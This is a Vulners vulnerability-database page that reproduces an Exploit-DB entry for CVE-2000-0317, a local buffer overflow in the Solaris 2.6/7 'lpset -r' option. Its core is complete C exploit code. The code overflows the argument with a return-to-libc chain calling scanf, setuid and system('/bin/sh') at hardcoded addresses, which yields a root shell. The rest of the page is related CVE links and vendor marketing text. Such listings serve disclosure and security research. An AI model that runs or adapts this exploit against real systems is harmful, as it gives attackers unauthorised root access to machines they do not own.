Lucene search
+L

Solaris 2.6/7.0 - 'lpset -r' Local Buffer Overflow (3)

🗓️ 24 Apr 2000 00:00:00Reported by Theodor Ragnar GislasonType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 21 Views

Local buffer overflow in Solaris lpset allows root command execution via crafted buffer input.

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2000-0317
18 May 200004:00
cve
cvelist
Cvelist
CVE-2000-0317
18 May 200004:00
cvelist
exploitdb
Exploit DB
Solaris 2.6/7.0 - 'lpset -r' Local Buffer Overflow (1)
24 Apr 200000:00
exploitdb
exploitdb
Exploit DB
Solaris 2.6/7.0 - 'lpset -r' Local Buffer Overflow (2)
24 Apr 200000:00
exploitdb
euvd
EUVD
EUVD-2000-0316
7 Oct 202500:30
euvd
nvd
NVD
CVE-2000-0317
24 Apr 200004:00
nvd
/*
source: https://www.securityfocus.com/bid/1138/info

A vulnerability exists in the handling of the -r option to the lpset program, as included in Solaris 7 from Sun Microsystems. The -r option is undocumented. As such, its use in unknown. However, when supplied a well crafted buffer containing executable code, it is possible to execute arbitrary commands as root.
*/

#define BASE 0xdff40000
#define STACK 0x8047e30
#define BUFSIZE 36

#define SYSTEM (BASE + 0x5b328)
#define SCANF  (BASE + 0x5ae80)
#define SETUID (BASE + 0x30873)
#define PERCD  (BASE + 0x83754)
#define BINSH  (BASE + 0x83654)
#define POP3   (SYSTEM + 610)
#define POP2   (SYSTEM + 611)
#define POP1   (SYSTEM + 612)

int
main()
{
    unsigned char expbuf[1024];
    char *env[1];
    int *p, i;

    memset(expbuf, 'a', BUFSIZE);
    p = (int *)(expbuf + BUFSIZE);

    *p++ = STACK;
    *p++ = SCANF + 1;
    *p++ = STACK + 6 * 4;
    *p++ = POP2;
    *p++ = PERCD;
    *p++ = STACK + 9 * 4;

    *p++ = STACK + 10 * 4;
    *p++ = SETUID;
    *p++ = POP1;
    *p++ = 0x33333333;
    *p++ = STACK + 15 * 4;

    *p++ = SYSTEM;
    *p++ = 0x33333333;
    *p++ = BINSH;
    *p = 0;

    env[0] = 0;
    execle("/bin/lpset", "/bin/lpset", "-n", "fns", "-r", expbuf, "123", 0,
           env);
    return 0;
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Nov 2017 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.2
EPSS0.01221
21